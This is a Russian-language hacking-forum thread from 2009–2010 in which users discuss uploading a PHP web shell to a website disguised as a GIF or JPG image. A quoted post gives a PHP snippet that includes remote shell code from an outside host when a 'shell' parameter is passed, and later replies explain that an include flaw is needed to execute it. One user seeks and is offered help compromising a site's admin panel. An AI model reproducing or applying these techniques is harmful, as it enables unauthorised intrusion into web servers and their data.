Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.05.2009, 11:39
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044
Репутация:
21
|
|
сделал всё как надо серавно тупит!!!
|
|
|
04.02.2010, 23:43
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме:
67426
Репутация:
0
|
|
Сообщение от m0Hze
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
|
|
|
|
05.02.2010, 00:48
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от oiki
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
|
|
|
|
05.02.2010, 00:57
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме:
67426
Репутация:
0
|
|
в таком случае есть ли еще способы?
|
|
|
|
05.02.2010, 01:04
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от oiki
в таком случае есть ли еще способы?
В каком именно случае?
|
|
|
|
05.02.2010, 03:31
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме:
67426
Репутация:
0
|
|
способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
|
|
|
|
05.02.2010, 03:32
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от oiki
способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
Ну так,что бы такой способ сработал,должны быть кое какие условия все же)) нельзя же просто залить картинку,и получить шелл.Вот я и спрашиваю,а какие условия у вас? Моет вы на рапиду льете шелл,кто вас знает
|
|
|
|
05.02.2010, 03:37
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме:
67426
Репутация:
0
|
|
есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.
Последний раз редактировалось oiki; 05.02.2010 в 03:52..
|
|
|
|
05.02.2010, 13:46
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме:
706093
Репутация:
97
|
|
Сообщение от oiki
есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.
Если есть админка то тут намного проще! напиши двиг сайта может смогу помочь! 
|
|
|
|
05.02.2010, 14:37
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Обычно это делается, если у тебя под рукой есть инклуд (или ещё что либо). Тупо заливаешь картинку со своим php кодом, и потом инклудишь чтобы код выполнился. А если ты просто залил картинку с php кодом, то просто так он исполнятся не будет ведь.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
